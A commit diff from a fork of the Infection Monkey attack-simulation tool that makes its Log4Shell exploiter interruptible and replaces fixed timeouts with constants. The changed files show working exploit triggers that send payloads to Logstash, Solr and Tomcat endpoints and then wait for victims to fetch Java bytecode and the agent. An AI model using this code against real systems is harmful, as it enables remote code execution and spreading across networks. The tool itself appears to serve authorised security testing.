p20319658
/
monkey
forked from p34709852/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Agent: Make log4shell interruptable

This commit is contained in:
vakaris_zilius 2022-03-21 15:04:24 +00:00
parent 7a1fcced2f
commit 41278c8044
4 changed files with 32 additions and 14 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

35
monkey/infection_monkey/exploit/log4shell.py
View File

@ -1,6 +1,7 @@
import logging import logging
import time import time
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT
from infection_monkey.exploit.log4shell_utils import ( from infection_monkey.exploit.log4shell_utils import (
LINUX_EXPLOIT_TEMPLATE_PATH, LINUX_EXPLOIT_TEMPLATE_PATH,
WINDOWS_EXPLOIT_TEMPLATE_PATH, WINDOWS_EXPLOIT_TEMPLATE_PATH,
@ -12,7 +13,6 @@ from infection_monkey.exploit.log4shell_utils import (
from infection_monkey.exploit.tools.http_tools import HTTPTools from infection_monkey.exploit.tools.http_tools import HTTPTools
from infection_monkey.exploit.web_rce import WebRCE from infection_monkey.exploit.web_rce import WebRCE
from infection_monkey.i_puppet.i_puppet import ExploiterResultData from infection_monkey.i_puppet.i_puppet import ExploiterResultData
from infection_monkey.model import DOWNLOAD_TIMEOUT as AGENT_DOWNLOAD_TIMEOUT
from infection_monkey.model import DROPPER_ARG, LOG4SHELL_LINUX_COMMAND, LOG4SHELL_WINDOWS_COMMAND from infection_monkey.model import DROPPER_ARG, LOG4SHELL_LINUX_COMMAND, LOG4SHELL_WINDOWS_COMMAND
from infection_monkey.network.info import get_free_tcp_port from infection_monkey.network.info import get_free_tcp_port
from infection_monkey.network.tools import get_interface_to_target from infection_monkey.network.tools import get_interface_to_target
@ -25,10 +25,8 @@ logger = logging.getLogger(__name__)
class Log4ShellExploiter(WebRCE): class Log4ShellExploiter(WebRCE):
_TARGET_OS_TYPE = ["linux", "windows"] _TARGET_OS_TYPE = ["linux", "windows"]
_EXPLOITED_SERVICE = "Log4j" _EXPLOITED_SERVICE = "Log4j"
SERVER_SHUTDOWN_TIMEOUT = 15 SERVER_SHUTDOWN_TIMEOUT = LONG_REQUEST_TIMEOUT
REQUEST_TO_VICTIM_TIMEOUT = ( REQUEST_TO_VICTIM_TIMEOUT = MEDIUM_REQUEST_TIMEOUT
5 # Max time agent will wait for the response from victim in SECONDS
)
def _exploit_host(self) -> ExploiterResultData: def _exploit_host(self) -> ExploiterResultData:
self._open_ports = [ self._open_ports = [
@ -135,6 +133,11 @@ class Log4ShellExploiter(WebRCE):
# because we don't know which services are running and on which ports # because we don't know which services are running and on which ports
for exploit in get_log4shell_service_exploiters(): for exploit in get_log4shell_service_exploiters():
for port in self._open_ports: for port in self._open_ports:
if self._is_interrupted():
self._set_interrupted()
return self.exploit_result
logger.debug( logger.debug(
f'Attempting Log4Shell exploit on for service "{exploit.service_name}"' f'Attempting Log4Shell exploit on for service "{exploit.service_name}"'
f"on port {port}" f"on port {port}"
@ -147,24 +150,26 @@ class Log4ShellExploiter(WebRCE):
f"potential {exploit.service_name} service: {ex}" f"potential {exploit.service_name} service: {ex}"
) )
if self._is_interrupted():
self._set_interrupted()
return self.exploit_result
if self._wait_for_victim(): if self._wait_for_victim():
self.exploit_info["vulnerable_service"] = { self.exploit_info["vulnerable_service"] = {
"service_name": exploit.service_name, "service_name": exploit.service_name,
"port": port, "port": port,
} }
self.exploit_info["vulnerable_urls"].append(url) self.exploit_info["vulnerable_urls"].append(url)
self.exploit_result.exploitation_success = True
self.exploit_result.propagation_success = True self.exploit_result.propagation_success = True
def _wait_for_victim(self) -> bool: def _wait_for_victim(self) -> bool:
# TODO: Peridodically check to see if ldap or HTTP servers have exited with an error. If
# they have, return with an error.
victim_called_back = False
victim_called_back = self._wait_for_victim_to_download_java_bytecode() victim_called_back = self._wait_for_victim_to_download_java_bytecode()
if victim_called_back: if victim_called_back:
self._wait_for_victim_to_download_agent() self._wait_for_victim_to_download_agent()
if self._is_interrupted():
return False
return victim_called_back return victim_called_back
def _wait_for_victim_to_download_java_bytecode(self) -> bool: def _wait_for_victim_to_download_java_bytecode(self) -> bool:
@ -174,8 +179,12 @@ class Log4ShellExploiter(WebRCE):
start_time, Log4ShellExploiter.REQUEST_TO_VICTIM_TIMEOUT start_time, Log4ShellExploiter.REQUEST_TO_VICTIM_TIMEOUT
): ):
if self._exploit_class_http_server.exploit_class_downloaded(): if self._exploit_class_http_server.exploit_class_downloaded():
self.exploit_result.exploitation_success = True
return True return True
if self._is_interrupted():
return False
time.sleep(1) time.sleep(1)
logger.debug("Timed out while waiting for victim to download the java bytecode") logger.debug("Timed out while waiting for victim to download the java bytecode")
@ -184,10 +193,14 @@ class Log4ShellExploiter(WebRCE):
def _wait_for_victim_to_download_agent(self): def _wait_for_victim_to_download_agent(self):
start_time = time.time() start_time = time.time()
while not self._victim_timeout_expired(start_time, AGENT_DOWNLOAD_TIMEOUT): while not self._victim_timeout_expired(start_time, LONG_REQUEST_TIMEOUT):
if self._agent_http_server_thread.downloads > 0: if self._agent_http_server_thread.downloads > 0:
break break
if self._is_interrupted():
return
# TODO: if the http server got an error we're waiting for nothing here
time.sleep(1) time.sleep(1)
@classmethod @classmethod

3
monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/logstash.py
View File

@ -2,6 +2,7 @@ from logging import getLogger
import requests import requests
from common.common_consts.timeouts import MEDIUM_REQUEST_TIMEOUT
from infection_monkey.exploit.log4shell_utils.service_exploiters import IServiceExploiter from infection_monkey.exploit.log4shell_utils.service_exploiters import IServiceExploiter
from infection_monkey.model import VictimHost from infection_monkey.model import VictimHost
@ -15,7 +16,7 @@ class LogStashExploit(IServiceExploiter):
def trigger_exploit(payload: str, host: VictimHost, port: int): def trigger_exploit(payload: str, host: VictimHost, port: int):
url = f"http://{host.ip_addr}:{port}/_node/hot_threads?human={payload}" url = f"http://{host.ip_addr}:{port}/_node/hot_threads?human={payload}"
try: try:
requests.get(url, timeout=5, verify=False) # noqa DUO123 requests.get(url, timeout=MEDIUM_REQUEST_TIMEOUT, verify=False) # noqa DUO123
except requests.ReadTimeout as e: except requests.ReadTimeout as e:
logger.debug(f"Log4shell request failed {e}") logger.debug(f"Log4shell request failed {e}")

3
monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/solr.py
View File

@ -2,6 +2,7 @@ from logging import getLogger
import requests import requests
from common.common_consts.timeouts import MEDIUM_REQUEST_TIMEOUT
from infection_monkey.exploit.log4shell_utils.service_exploiters import IServiceExploiter from infection_monkey.exploit.log4shell_utils.service_exploiters import IServiceExploiter
from infection_monkey.model import VictimHost from infection_monkey.model import VictimHost
@ -15,7 +16,7 @@ class SolrExploit(IServiceExploiter):
def trigger_exploit(payload: str, host: VictimHost, port: int): def trigger_exploit(payload: str, host: VictimHost, port: int):
url = f"http://{host.ip_addr}:{port}/solr/admin/cores?fu={payload}" url = f"http://{host.ip_addr}:{port}/solr/admin/cores?fu={payload}"
try: try:
requests.post(url, timeout=5, verify=False) # noqa DUO123 requests.post(url, timeout=MEDIUM_REQUEST_TIMEOUT, verify=False) # noqa DUO123
except requests.ReadTimeout as e: except requests.ReadTimeout as e:
logger.debug(f"Log4shell request failed {e}") logger.debug(f"Log4shell request failed {e}")

5
monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/tomcat.py
View File

@ -2,6 +2,7 @@ from logging import getLogger
import requests import requests
from common.common_consts.timeouts import MEDIUM_REQUEST_TIMEOUT
from infection_monkey.exploit.log4shell_utils.service_exploiters import IServiceExploiter from infection_monkey.exploit.log4shell_utils.service_exploiters import IServiceExploiter
from infection_monkey.model import VictimHost from infection_monkey.model import VictimHost
@ -16,7 +17,9 @@ class TomcatExploit(IServiceExploiter):
url = f"http://{host.ip_addr}:{port}/examples/servlets/servlet/SessionExample" url = f"http://{host.ip_addr}:{port}/examples/servlets/servlet/SessionExample"
payload = {"dataname": "foo", "datavalue": payload} payload = {"dataname": "foo", "datavalue": payload}
try: try:
requests.post(url, data=payload, timeout=5, verify=False) # noqa DUO123 requests.post( # noqa DUO123
url, data=payload, timeout=MEDIUM_REQUEST_TIMEOUT, verify=False
)
except requests.ReadTimeout as e: except requests.ReadTimeout as e:
logger.debug(f"Log4shell request failed {e}") logger.debug(f"Log4shell request failed {e}")